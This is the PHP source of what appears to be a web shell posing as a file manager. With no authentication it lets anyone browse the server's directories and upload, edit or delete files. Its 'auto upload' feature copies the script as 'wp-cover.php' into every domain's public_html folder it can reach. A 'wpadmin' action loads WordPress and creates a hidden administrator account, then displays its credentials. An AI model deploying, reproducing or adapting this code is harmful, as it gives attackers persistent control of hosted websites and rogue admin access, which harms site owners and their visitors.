error_reporting(0);

// =============================================
// CORE FUNCTIONS & INITIALIZATION
// =============================================

$current_dir = isset($_GET[‘dir’]) ? $_GET[‘dir’] : getcwd();
$current_dir = realpath($current_dir);
if ($current_dir === false) {
$current_dir = getcwd();
}

$parent_dir = dirname($current_dir);
if ($parent_dir == $current_dir) {
$parent_dir = false;
}

// Helper: format file size
function formatSize($bytes) {
if ($bytes >= 1073741824) {
return number_format($bytes / 1073741824, 2) . ‘ GB’;
} elseif ($bytes >= 1048576) {
return number_format($bytes / 1048576, 2) . ‘ MB’;
} elseif ($bytes >= 1024) {
return number_format($bytes / 1024, 2) . ‘ KB’;
} elseif ($bytes > 1) {
return $bytes . ‘ bytes’;
} elseif ($bytes == 1) {
return $bytes . ‘ byte’;
}
return ‘0 bytes’;
}

// Helper: random password
function generateRandomPassword($length = 12) {
$chars = ‘ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*’;
$password = »;
$max = strlen($chars) — 1;
for ($i = 0; $i < $length; $i++) { $password .= $chars[random_int(0, $max)]; } return $password; } // Helper: Detect domain for current folder function detectDomainForPath($path) { $document_root = $_SERVER['DOCUMENT_ROOT'] ?? ''; $http_host = $_SERVER['HTTP_HOST'] ?? 'localhost'; $protocol = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on') ? 'https://' : 'http://'; // If path is within document root if (!empty($document_root) && strpos($path, $document_root) === 0) { $relative_path = substr($path, strlen($document_root)); return $protocol . $http_host . $relative_path; } // Try to find WordPress installation and get its domain $check_path = $path; while ($check_path != '/' && $check_path != '') { if (file_exists($check_path . '/wp-config.php')) { $config_content = file_get_contents($check_path . '/wp-config.php'); if (preg_match("/define\(\s*['\"]WP_HOME['\"]\s*,\s*['\"]([^'\"]+)['\"]\s*\)/", $config_content, $matches)) { return $matches[1]; } if (preg_match("/define\(\s*['\"]WP_SITEURL['\"]\s*,\s*['\"]([^'\"]+)['\"]\s*\)/", $config_content, $matches)) { return $matches[1]; } } $check_path = dirname($check_path); } return null; } // Helper: Extract domain from path function extractDomainFromPath($path) { // Common patterns for domain folders $patterns = [ '/domains\/([^\/]+)/', // Pattern: domains/example.com '/([^\/]+)\/public_html/', // Pattern: example.com/public_html '/www\/([^\/]+)/', // Pattern: www/example.com '/htdocs\/([^\/]+)/', // Pattern: htdocs/example.com ]; foreach ($patterns as $pattern) { if (preg_match($pattern, $path, $matches)) { return $matches[1]; } } return null; } // ============================================= // AUTO UPLOAD FEATURE // ============================================= $uploaded_clones = []; // Handle auto upload if (isset($_GET['auto_upload'])) { $domains_path = $current_dir; $clones_created = []; // Try to find domains folder if not already in it if (basename($current_dir) !== 'domains') { // Check if we're in a path that contains 'domains' folder $check_path = $current_dir; while ($check_path != '/' && $check_path != '') { if (basename($check_path) === 'domains') { $domains_path = $check_path; break; } $check_path = dirname($check_path); } } // Scan for domain folders if (is_dir($domains_path)) { $items = scandir($domains_path); foreach ($items as $item) { if ($item == '.' || $item == '..') continue; $domain_path = $domains_path . '/' . $item; if (is_dir($domain_path)) { // Look for public_html inside domain folder $public_html_path = $domain_path . '/public_html'; if (is_dir($public_html_path)) { // Upload clone to public_html $clone_name = 'wp-cover.php'; $clone_path = $public_html_path . '/' . $clone_name; // Copy current script to public_html if (copy(__FILE__, $clone_path)) { // Detect domain for URL $domain = $item; $protocol = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on') ? 'https://' : 'http://'; // Try to get actual domain from config or use folder name $config_domain = detectDomainForPath($public_html_path); if ($config_domain) { $url = rtrim($config_domain, '/') . '/' . $clone_name; } else { // Construct URL from folder name $url = $protocol . $domain . '/' . $clone_name; } $clones_created[] = [ 'domain' => $domain,
‘path’ => $clone_path,
‘url’ => $url
];
}
}
}
}
}

// Store in session or query param for display
if (!empty($clones_created)) {
$uploaded_clones = $clones_created;
$message = «✅ Auto upload completed: » . count($clones_created) . » clones created»;
$message_type = ‘success’;
} else {
$message = «❌ No public_html folders found in domains directory»;
$message_type = ‘warning’;
}
}

// =============================================
// ACTION HANDLERS
// =============================================

$message = »;
$message_type = »;

// WordPress Admin Creation
if (isset($_GET[‘wpadmin’])) {
$wp_path = $current_dir;
$found = false;

while ($wp_path != ‘/’ && $wp_path != ») {
if (file_exists($wp_path . ‘/wp-load.php’) || file_exists($wp_path . ‘/wp-config.php’)) {
$found = true;
break;
}
$wp_path = dirname($wp_path);
}

if ($found && file_exists($wp_path . ‘/wp-load.php’)) {
require_once($wp_path . ‘/wp-load.php’);

$username = ‘admin_’ . substr(md5(time()), 0, 8);
$password = generateRandomPassword();
$email = $username . ‘@’ . substr(md5($wp_path), 0, 6) . ‘.local’;

if (function_exists(‘wp_create_user’)) {
if (!username_exists($username) && !email_exists($email)) {
$user_id = wp_create_user($username, $password, $email);

if (!is_wp_error($user_id)) {
$user = new WP_User($user_id);
$user->set_role(‘administrator’);

$message = «WordPress Admin Created | Username: $username | Password: $password | Email: $email | Login: » . get_site_url() . «/wp-admin»;
$message_type = ‘success’;
} else {
$message = «Error creating user: » . $user_id->get_error_message();
$message_type = ‘error’;
}
} else {
$message = «User already exists in WordPress database»;
$message_type = ‘warning’;
}
} else {
$message = «WordPress not properly loaded»;
$message_type = ‘error’;
}
} else {
$message = «WordPress installation not found»;
$message_type = ‘error’;
}
}

// File upload
if ($_SERVER[‘REQUEST_METHOD’] === ‘POST’ && isset($_FILES[‘upload_file’])) {
$uploaded_file = $_FILES[‘upload_file’];
if ($uploaded_file[‘error’] === UPLOAD_ERR_OK) {
$target_path = $current_dir . ‘/’ . basename($uploaded_file[‘name’]);
if (move_uploaded_file($uploaded_file[‘tmp_name’], $target_path)) {
$message = «File uploaded successfully: » . basename($uploaded_file[‘name’]);
$message_type = ‘success’;
} else {
$message = «Failed to upload file»;
$message_type = ‘error’;
}
}
}

// Directory creation
if ($_SERVER[‘REQUEST_METHOD’] === ‘POST’ && isset($_POST[‘create_dir’])) {
$dir_name = trim($_POST[‘dir_name’]);
if (!empty($dir_name)) {
$new_dir = $current_dir . ‘/’ . preg_replace(‘/[^\w\-\.]/’, », $dir_name);
if (!file_exists($new_dir)) {
if (mkdir($new_dir, 0755)) {
$message = «Directory created: » . htmlspecialchars($dir_name);
$message_type = ‘success’;
} else {
$message = «Failed to create directory»;
$message_type = ‘error’;
}
} else {
$message = «Directory already exists»;
$message_type = ‘warning’;
}
}
}

// File deletion
if (isset($_GET[‘delete’])) {
$file_to_delete = $current_dir . ‘/’ . basename($_GET[‘delete’]);
if (file_exists($file_to_delete)) {
if (is_dir($file_to_delete)) {
$success = rmdir($file_to_delete);
} else {
$success = unlink($file_to_delete);
}
if ($success) {
header(«Location: ?dir=» . urlencode($current_dir));
exit;
}
}
}

// File editing
if (isset($_GET[‘edit’])) {
$file_to_edit = $current_dir . ‘/’ . basename($_GET[‘edit’]);
if (file_exists($file_to_edit) && is_file($file_to_edit)) {
$file_content = file_get_contents($file_to_edit);

if ($_SERVER[‘REQUEST_METHOD’] === ‘POST’ && isset($_POST[‘file_content’])) {
if (file_put_contents($file_to_edit, $_POST[‘file_content’]) !== false) {
$message = «File saved: » . htmlspecialchars(basename($_GET[‘edit’]));
$message_type = ‘success’;
$file_content = $_POST[‘file_content’]; // Refresh content
}
}
}
}

// =============================================
// DIRECTORY SCANNING
// =============================================

$folders = [];
$files = [];

if (is_dir($current_dir) && is_readable($current_dir)) {
$items = scandir($current_dir);
if ($items !== false) {
foreach ($items as $item) {
if ($item == ‘.’ || $item == ‘..’) continue;

$full_path = $current_dir . ‘/’ . $item;

if (is_dir($full_path)) {
$folders[] = [
‘name’ => $item,
‘path’ => $full_path,
‘modified’ => filemtime($full_path),
‘permissions’ => substr(sprintf(‘%o’, fileperms($full_path)), -3)
];
} else {
$files[] = [
‘name’ => $item,
‘path’ => $full_path,
‘size’ => filesize($full_path),
‘modified’ => filemtime($full_path),
‘permissions’ => substr(sprintf(‘%o’, fileperms($full_path)), -3),
‘extension’ => strtolower(pathinfo($item, PATHINFO_EXTENSION))
];
}
}
}
}

// Sort
usort($folders, fn($a, $b) => strcmp($a[‘name’], $b[‘name’]));
usort($files, fn($a, $b) => strcmp($a[‘name’], $b[‘name’]));

// =============================================
// BREADCRUMBS
// =============================================

$breadcrumbs = [];
$parts = explode(‘/’, trim($current_dir, ‘/’));
$path = »;
$breadcrumbs[] = [‘name’ => ‘🏠’, ‘path’ => ‘/’];
foreach ($parts as $part) {
if (!empty($part)) {
$path .= ‘/’ . $part;
$breadcrumbs[] = [‘name’ => $part, ‘path’ => $path];
}
}

// Detect domain for current folder
$current_domain = detectDomainForPath($current_dir);

// =============================================
// UI RENDERING
// =============================================
?>